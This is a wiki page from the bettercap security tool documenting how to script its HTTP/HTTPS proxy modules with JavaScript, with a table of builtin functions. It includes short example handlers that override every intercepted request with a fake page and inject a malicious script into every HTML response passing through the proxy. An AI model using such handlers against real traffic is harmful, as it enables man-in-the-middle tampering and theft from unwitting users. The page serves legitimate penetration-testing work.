8 http.modules

yungtravla edited this page 2018-06-30 10:49:37 +10:00

Table of Contents

• Builtin Functions

The http.proxy and https.proxy modules can be scripted using javascript files that must declare at least one of the following functions:

// called when the script is loaded
function onLoad() {

}

// called when the request is received by the proxy
// and before it is sent to the real server.
function onRequest(req, res) {

}

// called when the request is sent to the real server
// and a response is received
function onResponse(req, res) {

}

// called every time an unknown session command is typed,
// proxy modules can optionally handle custom commands this way:
function onCommand(cmd) {
    if( cmd == "test" ) {
        /*
         * Custom session command logic here.
         */

        // tell the session we handled this command
        return true
    }
}

Modules can change the req request and res response objects, for instance the web-override.cap caplet is using the onRequest function in order to override every request before it is executed with a fake response:

function onRequest(req, res) {
    res.Status      = 200;
    res.ContentType = "text/html";
    res.Body        = readFile("caplets/www/index.html");
    headers         = res.Headers.split("\r\n")
    for (var i = 0; i < headers.length; i++) {
        header_name = headers[i].replace(/:.*/, "")
        res.RemoveHeader(header_name);
    }
    res.SetHeader("Connection", "close");
}

The login-man-abuse.cap caplet instead will use the onResponse handler to inject its malicious javascript file in every html response:

function onResponse(req, res) {
    if( res.ContentType.indexOf('text/html') == 0 ){
        var body = res.ReadBody();
        if( body.indexOf('</head>') != -1 ) {
            res.Body = body.replace( 
                '</head>', 
                '<script type="text/javascript">' + "\n" +
                    AbuserJavascript +
                '</script>' +
                '</head>'
            ); 
        }
    }
}

Builtin Functions

Modules can use the following builtin functions.

function	description
readFile("/path/to/file")	Return the contents of a file as a string.
writeFile("/path/to/file", "hello world")	Write the string hello world to a file, returns null or an error message.
log_debug("message")	Log a message in the interactive session (its level will be DEBUG).
log_info("message")	Log a message in the interactive session (its level will be INFO).
log_warn("message")	Log a message in the interactive session (its level will be WARNING).
log_error("message")	Log a message in the interactive session (its level will be ERROR).
log_fatal("message")	Log a message in the interactive session (its level will be FATAL).
log("message")	Shortcut for log_info("message").
btoa("message")	Encode a message to base64.
atob("bWVzc2FnZQ==")	Decode a message from base64.
env("iface.ipv4")	Read a variable.
env("foo", "bar")	Set a variable.

• Known Issues
• Using with Docker
• Compilation
  • on Linux and macOS
  • on Windows
  • on Android
  • cross compilation (ARM example)
• Interactive Mode and Command Line Arguments
• Changing the Prompt
• Caplets

Modules

• Core
  • events.stream
  • ticker
  • api.rest
  • update
  • caplets
• HID on 2.4Ghz (mousejacking)
  • hid.recon / sniff / inject
• Bluetooth Low Energy
  • ble.recon / enum / write
• 802.11
  • wifi.recon / assoc / deauth / ap
• Ethernet and IP
  • net.recon
  • net.probe
  • net.sniff / net.fuzz
  • syn.scan
  • wake on lan
  • Spoofers
    • arp.spoof
    • dhcp6.spoof
    • dns.spoof
  • Proxies
    • any.proxy
    • packet.proxy
    • tcp.proxy
      • modules
    • http.proxy
    • https.proxy
      • modules
• Servers
  • http.server
  • https.server
• Rogue Servers
  • mysql.server
• Utils
  • mac.changer
  • gps

bettercap.org | @bettercap | team